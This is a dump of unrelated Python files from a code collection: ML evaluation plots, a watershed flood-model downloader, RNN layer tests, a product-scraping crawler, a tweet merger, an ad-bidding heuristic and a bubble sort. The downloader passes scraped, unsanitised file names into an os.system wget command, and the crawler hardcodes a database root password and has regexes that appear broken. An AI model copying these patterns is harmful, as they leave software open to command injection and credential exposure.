']' + ' size: [' + str(alm_dataset.n_train) + ']' , size=15)\n \n plt.subplot(2, 2, 2)\n ax = sns.barplot(cv_feature_importance.index, cv_feature_importance)\n ax.set_title('Feature importance', size=15)\n ax.set_ylabel('Importance')\n ax.tick_params(labelsize=10) \n \n plt.subplot(2, 2, 3)\n cv_auroc_result = validation_cv_result[[s + '_auroc' for s in alm_dataset.compare_features] + ['auroc']]\n cv_auroc_result = cv_auroc_result.sort_values()\n predictors = list(cv_auroc_result.index)\n \n for i in range(len(predictors)):\n if '_auroc' in predictors[i]:\n predictors[i] = predictors[i][:-6]\n predictors[predictors.index('auroc')] = predictor_name \n \n ax = sns.barplot(predictors, cv_auroc_result)\n ax.set_title('Predictor performance AUROC' + ' [' + str(alm_dataset.cv_split_folds) + ' folds]', size=15)\n ax.set_ylabel('AUROC')\n ax.tick_params(labelsize=10)\n ax.set_ylim(0, 1)\n i = 0\n for p in ax.patches:\n height = p.get_height()\n ax.text(p.get_x() + p.get_width() / 2., height + 0.005, np.array(cv_auroc_result)[i], ha=\"center\") \n i += 1\n \n plt.subplot(2, 2, 4)\n cv_auprc_result = validation_cv_result[[s + '_auprc' for s in alm_dataset.compare_features] + ['auprc']]\n cv_auprc_result = cv_auprc_result.sort_values()\n predictors = list(cv_auprc_result.index)\n \n for i in range(len(predictors)):\n if '_auprc' in predictors[i]:\n predictors[i] = predictors[i][:-6]\n predictors[predictors.index('auprc')] = predictor_name \n ax = sns.barplot(predictors, cv_auprc_result)\n ax.set_title('Predictor performance AUPRC' + ' [' + str(alm_dataset.cv_split_folds) + ' folds]', size=15)\n ax.set_ylabel('AUPRC')\n ax.tick_params(labelsize=10)\n ax.set_ylim(0, 1)\n i = 0\n for p in ax.patches:\n height = p.get_height()\n ax.text(p.get_x() + p.get_width() / 2., height + 0.005, np.array(cv_auprc_result)[i], ha=\"center\") \n i += 1 \n \n 
fig.tight_layout()\n plt.savefig(self.path + 'cv_' + alm_dataset.name + '.png') \n \n if alm_dataset.ml_type == 'regression':\n fig = plt.figure(figsize=(16, 10))\n plt.clf()\n \n plt.subplot(3, 1, 3)\n ax = sns.barplot(cv_feature_importance.index[:10], cv_feature_importance[:10])\n ax.set_title('Feature importance', size=15)\n ax.set_ylabel('Importance')\n ax.tick_params(labelsize=10)\n \n plt.subplot(3, 1, 1)\n cv_pcc_result = validation_cv_result[[s + '_pcc' for s in alm_dataset.compare_features] + ['pcc']]\n cv_pcc_result = cv_pcc_result.sort_values()\n predictors = list(cv_pcc_result.index)\n \n for i in range(len(predictors)):\n if '_pcc' in predictors[i]:\n predictors[i] = predictors[i][:-4]\n predictors[predictors.index('pcc')] = predictor_name \n ax = sns.barplot(predictors, cv_pcc_result)\n ax.set_title('Predictor performance PCC' + ' [' + str(alm_dataset.cv_split_folds) + ' folds]', size=15)\n ax.set_ylabel('pcc')\n ax.tick_params(labelsize=10)\n # ax.set_ylim(0,1)\n i = 0\n for p in ax.patches:\n height = p.get_height()\n ax.text(p.get_x() + p.get_width() / 2., height + 0.005, np.array(cv_pcc_result)[i], ha=\"center\") \n i += 1 \n pass \n \n plt.subplot(3, 1, 2)\n cv_rmse_result = validation_cv_result[[s + '_rmse' for s in alm_dataset.compare_features] + ['rmse']]\n cv_rmse_result = cv_rmse_result.sort_values()\n predictors = list(cv_rmse_result.index)\n \n for i in range(len(predictors)):\n if '_rmse' in predictors[i]:\n predictors[i] = predictors[i][:-5]\n predictors[predictors.index('rmse')] = predictor_name \n ax = sns.barplot(predictors, cv_rmse_result)\n ax.set_title('Predictor performance rmse' + ' [' + str(alm_dataset.cv_split_folds) + ' folds]', size=15)\n ax.set_ylabel('rmse')\n ax.tick_params(labelsize=10)\n i = 0\n for p in ax.patches:\n height = p.get_height()\n ax.text(p.get_x() + p.get_width() / 2., height + 0.005, np.array(cv_rmse_result)[i], ha=\"center\") \n i += 1 \n pass \n fig.tight_layout()\n plt.savefig(self.path + 'cv_' + alm_dataset.name + '.png') \n \n def remove_features(self, features, i):\n remove_features = features[i]\n if any(isinstance(i, list) for i in features): # if features are nested list\n features = list(itertools.chain(*features)) \n features = list(set(features)) \n if isinstance(remove_features, list): \n for x in remove_features:\n features.remove(x)\n else:\n features.remove(remove_features)\n features = list(set(features)) \n return (features)\n \n","sub_path":"ml/python/alm_project.py","file_name":"alm_project.py","file_ext":"py","file_size_in_byte":56656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
+{"seq_id":"157447007","text":"\"\"\"\n    mom_output_all.py\n    -- modified from mom_output.py\n    -- extract output for all watersheds for a given date\n    parameters:\n    -- pfafidlist: a csv file that has a pfaf_id column\n    -- date: YYYYMMDDHH\n    output:\n    -- watersheds_YYYYMMDDHH.geojson: watersheds in the list\n    example:\n    python mom_output_all.py pakistan2022/research_watersheds.csv 20220901 pakistan2022\n\"\"\"\n\nimport argparse\nimport os\n\nimport geopandas as gpd\nimport pandas as pd\nimport requests\nfrom bs4 import BeautifulSoup\n\nMOM_DOWNLOAD_FOLDER = \"pdc_final\"\nMOM_GEOJSON_FOLDER = \"geojson\"\n\n\ndef download_mom(starttime, endtime):\n    \"\"\"download mom output in a time period\"\"\"\n    baseurl = \"https://mom.tg-ear190027.projects.jetstream-cloud.org/ModelofModels/Final_Alert/\"\n    reqs = requests.get(baseurl)\n    soup = BeautifulSoup(reqs.text, \"html.parser\")\n\n    start_mom = 
\"Final_Attributes_{}HWRF+MOM+DFO+VIIRSUpdated_PDC.csv\".format(starttime)\n end_mom = \"Final_Attributes_{}HWRF+MOM+DFO+VIIRSUpdated_PDC.csv\".format(endtime)\n\n mom_list = []\n for link in soup.find_all(\"a\"):\n fstr = link.string\n if not \"csv\" in fstr:\n continue\n if fstr >= start_mom and fstr <= end_mom:\n mom_list.append(fstr)\n if not os.path.exists(os.path.join(MOM_DOWNLOAD_FOLDER, fstr)):\n dataurl = os.path.join(baseurl, fstr)\n wgetcmd = \"wget -nc \" + dataurl + \" -P \" + MOM_DOWNLOAD_FOLDER\n os.system(wgetcmd)\n mom_list.sort()\n return mom_list\n\n\ndef merge_mom(df_ids, momfiles):\n \"\"\"merge mom output to one csv\"\"\"\n filed_list = [\"Severity\", \"Flag\", \"Alert\"]\n for mom_field in filed_list:\n joined_df = df_ids.copy()\n joined_df.set_index(\"pfaf_id\", inplace=True)\n\n total_file = len(momfiles)\n for count, mom in enumerate(momfiles):\n print(\"processing {} / {}\".format(count, total_file))\n mom_df = pd.read_csv(\n os.path.join(MOM_DOWNLOAD_FOLDER, mom), encoding=\"ISO-8859-1\"\n )\n mom_df = mom_df[[\"pfaf_id\", mom_field]]\n mom_df = mom_df.drop_duplicates(subset=[\"pfaf_id\"])\n # Final_Attributes_2022081606HWRF+MOM+DFO+VIIRSUpdated_PDC.csv\n datestr = mom[17 : 17 + 10]\n # rename alert\n mom_df.rename(columns={mom_field: datestr}, inplace=True)\n mom_df.set_index(\"pfaf_id\", inplace=True)\n # merge stuff\n joined_df = joined_df.join(mom_df, how=\"left\")\n mom_df = None\n\n joined_df.to_csv(f\"momoutput_{mom_field}.csv\", index=True, float_format=\"%.3f\")\n joined_df = None\n\n\ndef output_geojson(df_ids, momfiles):\n \"\"\"output geojsons for selected watersheds\"\"\"\n\n watersheds_gdb = os.path.expanduser(\n \"~/Projects/ModelOfModels/VIIRS_Processing/Watershed_pfaf_id.shp\"\n )\n watersheds = gpd.read_file(watersheds_gdb)\n watersheds.set_index(\"pfaf_id\", inplace=True)\n\n # only use sub of watersheds\n idfield = \"pfaf_id\"\n out_df = watersheds.loc[df_ids[idfield]]\n\n total_file = len(momfiles)\n for count, mom in enumerate(momfiles):\n print(\"generating geojson {} / {}\".format(count, total_file))\n mom_df = pd.read_csv(\n os.path.join(MOM_DOWNLOAD_FOLDER, mom), encoding=\"ISO-8859-1\"\n )\n mom_df = mom_df.drop_duplicates(subset=[idfield])\n # drop columns\n mom_df.drop(columns=[\"area_km2\", \"rfr_score\", \"cfr_score\"], inplace=True)\n mom_df.set_index(\"pfaf_id\", inplace=True)\n\n datestr = mom[17 : 17 + 10]\n\n # get subset\n joined_df = out_df.join(mom_df, how=\"left\")\n outputfile = os.path.join(MOM_GEOJSON_FOLDER, f\"watersheds_all_{datestr}.geojson\")\n if not os.path.exists(outputfile):\n joined_df.to_file(outputfile, driver=\"GeoJSON\")\n # alist = [\"Warning\", \"Watch\"]\n # for acond in alist:\n # n_df = joined_df[joined_df.Alert == acond]\n # if not n_df.empty:\n # outputfile = os.path.join(\n # MOM_GEOJSON_FOLDER, f\"{datestr}_{acond}.geojson\"\n # )\n # if not os.path.exists(outputfile):\n # n_df.to_file(outputfile, driver=\"GeoJSON\")\n return\n \n\ndef extract_mom(csvfile, timeperiod, outputfolder):\n \"\"\"extract mom outputs\"\"\"\n\n # load list of watersheds\n df = pd.read_csv(csvfile)\n df = df[[\"pfaf_id\"]]\n\n # check the folder\n mom_folder = os.path.join(outputfolder, MOM_DOWNLOAD_FOLDER)\n if not os.path.exists(mom_folder):\n os.makedirs(mom_folder)\n\n mom_folder = os.path.join(outputfolder, MOM_GEOJSON_FOLDER)\n if not os.path.exists(mom_folder):\n os.makedirs(mom_folder)\n os.chdir(outputfolder)\n\n if len(timeperiod) == 8:\n start_t = timeperiod + \"00\"\n else:\n start_t = timeperiod \n end_t = 
start_t\n\n    # start_t += \"00\"\n    # end_t += \"18\"\n    mom_list = download_mom(start_t, end_t)\n    print(mom_list)\n    # extract mom output to one file\n    #merge_mom(df, mom_list)\n\n    # generate geojson output\n    output_geojson(df, mom_list)\n\n\ndef main():\n    parser = argparse.ArgumentParser(description=__doc__)\n    parser.add_argument(\"idlist\", type=str, help=\"csv file that contains pfaf_id\")\n    parser.add_argument(\"timeperiod\", type=str, help=\"time period: YYYYMMDDHH\")\n    parser.add_argument(\"outputfolder\", type=str, help=\"output folder\")\n    args = parser.parse_args()\n    extract_mom(args.idlist, args.timeperiod, args.outputfolder)\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"tools/mom_output_all.py","file_name":"mom_output_all.py","file_ext":"py","file_size_in_byte":5583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
+{"seq_id":"462006689","text":"import re\nfrom urllib.parse import urlparse\n\n\nclass DomainException(Exception):\n    \"\"\"Raised when an invalid domain is created.\"\"\"\n\n\nclass Domain:\n    def __init__(self, name: str):\n        valid_domain_name = re.match(r\".*\\.[a-z]{2,3}$\", name)\n        if valid_domain_name:\n            self.name = name\n        else:\n            raise DomainException\n\n    def __str__(self):\n        return self.name\n\n    @classmethod\n    def parse_url(cls, url: str):\n        domain_portion = urlparse(url).netloc\n        return cls(name=domain_portion)\n\n    @classmethod\n    def parse_email(cls, email: str):\n        _, _, domain_portion = email.rpartition(\"@\")\n        return cls(name=domain_portion)\n","sub_path":"313/constructors.py","file_name":"constructors.py","file_ext":"py","file_size_in_byte":682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"}
+{"seq_id":"454296025","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom random import choice\n\nimport numpy as np\nimport pytest\nfrom hypothesis import given\nfrom hypothesis import settings\nfrom hypothesis import strategies as st\n\nfrom NumPyNet.layers import RNN_layer\n\n__author__ = ['Mattia Ceccarelli', 'Nico Curti']\n__email__ = ['mattia.ceccarelli3@studio.unibo.it', 'nico.curti2@unibo.it']\n\n\nclass TestRNNLayer:\n  '''\n  Tests:\n    - constructor of RNN_layer object\n    - print function\n\n  to be:\n    forward function against tf.keras\n    update function\n    backward function against tf.keras\n  '''\n\n  @given(outputs=st.integers(min_value=-3, max_value=10),\n         steps=st.integers(min_value=1, max_value=4),\n         b=st.integers(min_value=5, max_value=15),\n         w=st.integers(min_value=15, max_value=100),\n         h=st.integers(min_value=15, max_value=100),\n         c=st.integers(min_value=1, max_value=10))\n  @settings(max_examples=10,\n            deadline=None)\n  def test_constructor(self, outputs, steps, b, w, h, c):\n\n    numpynet_activ = ['relu', 'logistic', 'tanh', 'linear']\n\n    if outputs > 0:\n      weights_choice = [np.random.uniform(low=-1, high=1., size=(w * h * c, outputs)), None]\n      bias_choice = [np.random.uniform(low=-1, high=1., size=(outputs,)), None]\n\n    else:\n      with pytest.raises(ValueError):\n        RNN_layer(outputs=outputs, steps=steps)\n\n      outputs += 10\n      weights_choice = [[np.random.uniform(low=-1, high=1., size=(w * h * c, outputs))] * 3, None]\n      bias_choice = [[np.random.uniform(low=-1, high=1., size=(outputs,))] * 3, None]\n\n    weights = choice(weights_choice)\n    bias = choice(bias_choice)\n\n    for numpynet_act in numpynet_activ:\n      layer = RNN_layer(outputs=outputs, steps=steps, activation=numpynet_act,\n                        input_shape=(b, w, h, 
c),\n weights=weights, bias=bias)\n\n if weights is not None:\n np.testing.assert_allclose(layer.input_layer.weights, weights[0], rtol=1e-5, atol=1e-8)\n np.testing.assert_allclose(layer.self_layer.weights, weights[1], rtol=1e-5, atol=1e-8)\n np.testing.assert_allclose(layer.output_layer.weights, weights[2], rtol=1e-5, atol=1e-8)\n\n if bias is not None:\n np.testing.assert_allclose(layer.input_layer.bias, bias[0], rtol=1e-5, atol=1e-8)\n np.testing.assert_allclose(layer.self_layer.bias, bias[1], rtol=1e-5, atol=1e-8)\n np.testing.assert_allclose(layer.output_layer.bias, bias[2], rtol=1e-5, atol=1e-8)\n\n assert layer.output is None\n\n @given(outputs=st.integers(min_value=3, max_value=10),\n steps=st.integers(min_value=1, max_value=4),\n b=st.integers(min_value=5, max_value=15),\n w=st.integers(min_value=15, max_value=100),\n h=st.integers(min_value=15, max_value=100),\n c=st.integers(min_value=1, max_value=10))\n @settings(max_examples=10,\n deadline=None)\n def test_printer(self, outputs, steps, b, w, h, c):\n\n layer = RNN_layer(outputs=outputs, steps=steps, activation='linear')\n\n with pytest.raises(TypeError):\n print(layer)\n\n layer = RNN_layer(outputs=outputs, steps=steps, activation='linear', input_shape=(b, w, h, c))\n\n print(layer)\n","sub_path":"testing/test_rnn_layer.py","file_name":"test_rnn_layer.py","file_ext":"py","file_size_in_byte":3496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"415731563","text":"import urllib.request\nimport re\nimport pymysql\nimport os\nimport random\nfrom urllib.request import urlopen, Request\n\ndb = pymysql.connect(\"localhost\", \"root\", \"87654321\", \"AnShop\")\ncursor = db.cursor()\n\ndef downloadIMG(url, path):\n opener=urllib.request.build_opener()\n opener.addheaders=[('User-Agent','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1941.0 Safari/537.36')]\n urllib.request.install_opener(opener)\n urllib.request.urlretrieve(url, path)\n print(\"\\tSave to \", path)\n\ndef getHTMLFromUrl(url):\n fp = urllib.request.urlopen(url)\n mybytes = fp.read()\n html = mybytes.decode(\"utf8\")\n fp.close()\n return html\n\ndef findRegexInHTML(regex, html):\n matchs = re.findall(regex, html)\n return matchs\n\ndef getLinkProduct(html):\n result = []\n regexLink = r''\n regexImage = r'\\n\t\\t\\t\\t\\t\\t\\t

(.*)<\\/h4>', html)\n productDetail = findRegexInHTML(r'
\\n\\t\\t\\t\\t\\t\\t\\t\\t\\n(.*)<\\/span>', html)\n productPrice = findRegexInHTML(r'
\\n(.*)<\\/span>', html)\n query = \"INSERT INTO `AnShop`.`Products` (`ProductName`, `GroupSizeID`,`CategoryID`, `Price`, `UnitsInStock`, `Detail`, `Deleted`) VALUES (%s, 4, 3, %s, 50, %s, 0)\"\n value = [productNameVN, productPrice, productDetail]\n try:\n cursor.execute(query, value)\n db.commit()\n print(\"Inserted \"+productNameVN)\n except:\n print(\"Error in insert\", productNameVN)\n\n queryGetID = \"SELECT ProductID FROM AnShop.Products where ProductName = %s\"\n cursor.execute(queryGetID, productNameVN)\n result = cursor.fetchone()\n productID = int(result[0])\n\n tmp = url.split(\"/\");\n productName = tmp[len(tmp)-1].split(\"?\")[0]\n color = url.split(\"=\")[1]\n colorID = int()\n\n linkImages = re.findall(r'', html)\nfor match in matchs:\n url = 'https://coupletx.com' + match[0]\n print('\\n', match)\n # getProduct(url)\n\n","sub_path":"public/image/crawl.py","file_name":"crawl.py","file_ext":"py","file_size_in_byte":3740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"242157739","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Aug 23 15:12:34 2016\n\n@author: Administrator\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n##데이터 정형화 및 파싱\ndata = np.genfromtxt('C:\\\\Users\\\\Administrator\\\\Desktop\\\\data\\\\sample_group.txt',dtype='str')#일자별 성과 csv 파일\n\n\nfor i in range(int((data.shape[0]/7))) :\n if i == 0:\n ad_sets = np.array([data[i*7:(i+1)*7]])\n else :\n ad_sets = np.append(ad_sets, [data[i*7:(i+1)*7]],axis = 0)\n\nfor i in range(ad_sets.shape[0]):\n if i == 0 :\n cvr = np.array([[float(j.strip('%')) for j in (np.transpose(ad_sets[i])[8])]])\n ctr = np.array([[float(l.strip('%')) for l in (np.transpose(ad_sets[i])[7])]])\n cnt = np.array([[float(n)/100 for n in (np.transpose(ad_sets[i])[6])]])\n revenue = np.array([int(s.replace(',','')) for s in (np.transpose(ad_sets[i])[2])])\n cost = np.array([int(k.replace(',','')) for k in (np.transpose(ad_sets[i])[3])])\n marg = np.array([(1 - cost/(revenue+100))*100])\n ssp = np.array([[m for m in np.transpose(ad_sets[i])[9]]])\n\n else :\n cvr = np.append(cvr, [[float(j.strip('%')) for j in (np.transpose(ad_sets[i])[8])]], axis =0)\n ctr = np.append(ctr,[[float(l.strip('%')) for l in (np.transpose(ad_sets[i])[7])]], axis =0)\n cnt = np.append(cnt,[[float(n)/100 for n in (np.transpose(ad_sets[i])[6])]], axis = 0) \n revenue = np.array([int(s.replace(',','')) for s in (np.transpose(ad_sets[i])[2])])\n cost = np.array([int(k.replace(',','')) for k in (np.transpose(ad_sets[i])[3])]) \n marg = np.append(marg,[(1 - cost/(revenue+100))*100], axis =0)\n ssp = np.append(ssp, [[m for m in np.transpose(ad_sets[i])[9]]], axis =0)\n\n\n###data sort and dvide complete\n\n\n\n\n\n\na_cvr = 0.08\nb_cvr = 200\nc_cvr = 1\n\na_ctr = 5\nb_ctr = 0\n\na_marg = 1\nb_marg = 0\n\n##for 구문 돌리기\ncvr_r = b_cvr*1/(1+(np.exp(-a_cvr*cvr*cnt+c_cvr)))\nctr_r = (a_ctr*ctr + b_ctr)\nmarg_r = (a_marg*marg + b_marg + ctr_r)\n\nc = (cvr_r + marg_r + ctr_r)\n\n\n#for i in c :\n# plt.plot(i,'o')\n#for i in range(24) :\ni = 2\n\nplt.plot(cvr[i]*cnt[i])\nplt.plot(10*ctr[i])\nplt.plot(marg[i])\nplt.plot(c[i]/2)\n\n\n\nc_t =np.array([])\nc_t_r = 0 \n\nfor i in c :\n for j in range(i.size) :\n if j == 0:\n c_t_r = i[j]\n else :\n r = np.absolute(c_t_r - i[j])/c_t_r\n k = 1/r\n c_t_r = (1/2)*( (j/(j+1))*c_t_r + (1/(j+1))*i[j] + (1/2)*((1/k+1)*c_t_r + (k/k+1)*i[j]))\n c_t = np.append(c_t,c_t_r) \n\n\n#학습 알고리즘\n\"\"\"\ninput1 =0\n\nfor i in c :\n for j in range(i.size) :\n if (j ==0) :\n input2 
= i[j]#substitute the sensorValue reading for ain.read() here\n            output1 = input2\n\n        else :\n            input2 = i[j] #substitute the sensorValue reading for ain.read() here\n            output2 = 0.9394*output1+0.0303*input2+0.0303*input1\n            output1= output2\n            input1 = input2\n\n    c_t = np.append(c_t,output2) \n\n\"\"\"\nsigma = c_t/c_t.sum()\n\n#sigma_p = np.exp( 50*(sigma-0.1))\n\n\"\"\"\nindex = argmin(N -sigma*mulang)\nw(index)\n\n\"\"\"\n\n##import bid_floor data\nbanner = np.loadtxt('C:\\\\Users\\\\Administrator\\\\Desktop\\\\data\\\\banner.txt')#paid bid floor history (recent? or over the past year?)_banner\ninner = np.loadtxt('C:\\\\Users\\\\Administrator\\\\Desktop\\\\data\\\\inner.txt')\nlock = np.loadtxt('C:\\\\Users\\\\Administrator\\\\Desktop\\\\data\\\\lock.txt')\nnative = np.loadtxt('C:\\\\Users\\\\Administrator\\\\Desktop\\\\data\\\\native.txt')\n\nbanner = np.transpose(banner)\ninner = np.transpose(inner)\nlock = np.transpose(lock)\nnative = np.transpose(native)\n\n\n\nbanner_N = banner[1][1:].cumsum()\nbanner_bid_f = banner[0][1:]\nbanner_o = banner[1][1:]\n\ninner_N = inner[1][1:].cumsum()\ninner_bid_f = inner[0][1:]\ninner_o = inner[1][1:]\n\nlock_N = lock[1][1:].cumsum()\nlock_bid_f = lock[0][1:]\nlock_o = lock[1][1:]\n\nnative_N = native[1][1:].cumsum()\nnative_bid_f = native[0][1:]\nnative_o = native[1][1:]\n\n\nsigma_N = np.array([])\nsol_bid_floors = np.array([])\n\ntotal_sum = banner_N[-1] + inner_N[-1]+lock_N[-1]+native_N[-1]\ntotal_buget = (banner_o*banner_bid_f).sum() + (inner_o*inner_bid_f).sum() + (lock_o*lock_bid_f).sum() + (native_o*native_bid_f).sum()\nsol_indexes = np.array([])\nsol_budgets = np.array([])\nsigma_percents = np.array([])\n\nfor i in range(ssp.shape[0]) :\n    ssp_id = np.fromstring(ssp[i][0], dtype=int, sep=',')\n    for j in ssp_id :\n        if j == 1 :\n            sigma_bid = total_sum*sigma[i]\n            sigma_bid = banner_N[-1]*1/(1+2*np.exp(-3*sigma_bid/(2*banner_N[-1])))\n            sigma_percent = 1/(1+2*np.exp(-3*sigma_bid/(2*banner_N[-1])))\n\n\n            sol_index = np.argmin(np.absolute(0.7*(banner_N-sigma_bid)) + 0.3*(banner_bid_f)/(banner_o))#calculate the effect of the bid price on per-placement data\n            sol_bid_floor = banner_bid_f[sol_index]\n            print(sol_index)\n\n            sol_budget = (banner_o[0:sol_index]*banner_bid_f[0:sol_index]).sum()\n\n\n            sigma_N = np.append(sigma_N, sigma_bid)\n            sol_bid_floors = np.append(sol_bid_floors, sol_bid_floor)\n            sol_budgets = np.append(sol_budgets, sol_budget)\n            sol_indexes = np.append(sol_indexes, sol_index)\n            sigma_percents = np.append(sigma_percents, sigma_percent)\n\n        elif j == 6 :\n\n            sigma_bid = total_sum*sigma[i]\n            sigma_bid = inner_N[-1]*1/(1+2*np.exp(-3*sigma_bid/(2*inner_N[-1])))\n            sigma_percent = 1/(1+2*np.exp(-3*sigma_bid/(2*inner_N[-1])))\n\n\n            sol_index = np.argmin(np.absolute(0.7*(inner_N-sigma_bid))+0.3*(inner_bid_f)/(inner_o))\n            sol_bid_floor = inner_bid_f[sol_index]\n            print(sol_index)\n\n            sol_budget = (inner_o[0:sol_index]*inner_bid_f[0:sol_index]).sum()\n\n            sigma_N = np.append(sigma_N, sigma_bid)\n            sol_bid_floors = np.append(sol_bid_floors, sol_bid_floor)\n            sol_budgets = np.append(sol_budgets, sol_budget)\n            sol_indexes = np.append(sol_indexes, sol_index)\n            sigma_percents = np.append(sigma_percents, sigma_percent)\n\n        elif j == 11 :\n\n            sigma_bid = total_sum*sigma[i]\n            sigma_bid = lock_N[-1]*1/(1+2*np.exp(-3*sigma_bid/(2*lock_N[-1])))\n            sigma_percent = 1/(1+2*np.exp(-3*sigma_bid/(2*lock_N[-1])))\n\n            sol_index = np.argmin(np.absolute(0.7*(lock_N-sigma_bid)) + 0.3*(lock_bid_f)/(lock_o))\n            sol_bid_floor = lock_bid_f[sol_index]\n            print(sol_index)\n\n            sol_budget = (lock_o[0:sol_index]*lock_bid_f[0:sol_index]).sum() \n\n            sigma_N = np.append(sigma_N, 
sigma_bid)\n sol_bid_floors = np.append(sol_bid_floors, sol_bid_floor)\n sol_budgets = np.append(sol_budgets, sol_budget)\n sol_indexes = np.append(sol_indexes, sol_index)\n sigma_percents = np.append(sigma_percents, sigma_percent)\n\n elif j == 14 :\n\n sigma_bid = total_sum*sigma[i]\n sigma_bid = native_N[-1]*1/(1+2*np.exp(-3*sigma_bid/(2*native_N[-1]))) \n sigma_percent = 1/(1+2*np.exp(-3*sigma_bid/(2*lock_N[-1])))\n\n sol_index = np.argmin(np.absolute(0.7*(sigma_bid-native_N)) + 0.3*(native_bid_f)/(native_o))\n sol_bid_floor = native_bid_f[sol_index]\n print(sol_index)\n\n sol_budget = (native_o[0:sol_index]*native_bid_f[0:sol_index]).sum()\n\n sigma_N = np.append(sigma_N, sigma_bid)\n sol_bid_floors = np.append(sol_bid_floors, sol_bid_floor)\n sol_budgets = np.append(sol_budgets, sol_budget)\n sol_indexes = np.append(sol_indexes, sol_index)\n sigma_percents = np.append(sigma_percents, sigma_percent)\n\n\n\"\"\"\n\n\nfor i in range(ssp.shape[0]) :\n ssp_id = np.fromstring(ssp[i][0], dtype=int, sep=',')\n for j in ssp_id :\n if j == 1 :\n sigma_bid = total_sum*sigma[i]\n sol_index = np.argmin(np.absolute(total_buget*(banner_N-sigma_bid)*(banner_o*banner_bid_f)))\n sol_bid_floor = banner_bid_f[sol_index]\n print(sol_index)\n\n sigma_N = np.append(sigma_N, sigma_bid)\n sol_bid_floors = np.append(sol_bid_floors, sol_bid_floor)\n\n elif j == 6 :\n\n sigma_bid = total_sum*sigma[i]\n sol_index = np.argmin(np.absolute(total_buget*(inner_N-sigma_bid)/(inner_o*inner_bid_f)))\n sol_bid_floor = inner_bid_f[sol_index]\n print(sol_index)\n\n sigma_N = np.append(sigma_N, sigma_bid)\n sol_bid_floors = np.append(sol_bid_floors, sol_bid_floor)\n\n elif j == 11 :\n\n sigma_bid = total_sum*sigma[i]\n sol_index = np.argmin(np.absolute(total_buget*(lock_N-sigma_bid)/(lock_o*lock_bid_f)))\n sol_bid_floor = lock_bid_f[sol_index]\n print(sol_index) \n\n sigma_N = np.append(sigma_N, sigma_bid)\n sol_bid_floors = np.append(sol_bid_floors, sol_bid_floor)\n elif j == 14 :\n\n sigma_bid = total_sum*sigma[i]\n sol_index = np.argmin(np.absolute(total_buget*(native_N- sigma_bid)/(native_o*native_bid_f)))\n sol_bid_floor = native_bid_f[sol_index]\n print(sol_index)\n\n sigma_N = np.append(sigma_N, sigma_bid)\n sol_bid_floors = np.append(sol_bid_floors, sol_bid_floor)\n\n\"\"\"\n\n\nsol_bid_price = np.array([])\n\n\nfor sol_bid_floor in sol_bid_floors :\n if sol_bid_floor >0 and sol_bid_floor <50 :\n win_price = 1.09492801*sol_bid_floor\n bid_price = win_price*1.1\n sol_bid_price = np.append(sol_bid_price, bid_price)\n\n elif sol_bid_floor >=50 and sol_bid_floor <500 :\n win_price = 1.4473831*sol_bid_floor\n bid_price = win_price*1.1\n sol_bid_price = np.append(sol_bid_price, bid_price)\n\n elif sol_bid_floor >=500 and sol_bid_floor <800 :\n win_price = 1.31303544*sol_bid_floor\n bid_price = win_price*1.1\n sol_bid_price = np.append(sol_bid_price, bid_price)\n\n elif sol_bid_floor >=800 and sol_bid_floor <1000 :\n win_price = 1000\n bid_price = win_price*1.1\n sol_bid_price = np.append(sol_bid_price, bid_price)\n\n\n elif sol_bid_floor >1000 :\n win_price = 1.2*sol_bid_floor\n bid_price = win_price*1.1\n sol_bid_price = np.append(sol_bid_price, bid_price)\n\nprint (sol_bid_price)\nprint(sol_indexes)\n\n\nbudget=300000\n\ntotal_real_bud = 0.1*(sol_budgets/1000000) + 0.8*budget*np.exp(sigma*100)/np.exp(sigma*100).sum()\n","sub_path":"bidding algorithm.py","file_name":"bidding algorithm.py","file_ext":"py","file_size_in_byte":10425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} 
+{"seq_id":"121739894","text":"# Script to merge two collections into one.\r\n\r\nimport pymongo\r\nfrom pymongo import MongoClient\r\nimport time\r\n\r\nconn = MongoClient('localhost') # The MongoDB connection info\r\ndb = conn.testDB # This assumes your database name is testDB \r\nimportedCollection = db.dateCleanTweets # collection to be accessed for tweets\r\nexportedCollection = db.finalTweets # collection to be stored in\r\n\r\ndef insertDocuments():\r\n t = time.process_time()\r\n for eachDocument in importedCollection.find({},{ \"_id\": 0}):\r\n date = eachDocument['date']\r\n text = eachDocument['text']\r\n # if (eachDocument.get('extended_tweet')):\r\n # text = eachDocument['extended_tweet']['full_text']\r\n # elif (eachDocument.get('retweeted_status')):\r\n # text = eachDocument['retweeted_status']['full_text']\r\n # elif (eachDocument.get('retweeted_status') and eachDocument.get('extended_tweet')):\r\n # text = eachDocument['retweeted_status']['full_text']\r\n # else:\r\n \r\n mydict = { \"date\": date, \"text\": text}\r\n # print(mydict)\r\n exportedCollection.insert_one(mydict)\r\n elapsed_time = time.process_time() - t\r\n print( \"Done! Time Elapsed: \" + str(elapsed_time))\r\n \r\ninsertDocuments()\r\n\r\n","sub_path":"code/merge.py","file_name":"merge.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"387533245","text":"import copy\nimport sort_tools\n\ndef bubble_sort(data, low, high):\n for i in range(low, high):\n for j in range(low, high-low-1):\n \t#swap\n if data[j] > data[j+1]:\n temp = data[j]\n data[j] = data[j+1]\n data[j+1] = temp\n \n@sort_tools.timeit('bubble') \ndef sort(data):\n bubble_sort(data, 0, len(data))\n\ndef main():\n data = sort_tools.build_data_set(5)\n\n unsorted = copy.deepcopy(data)\n sort(unsorted)\n\nif __name__ == \"__main__\":\n 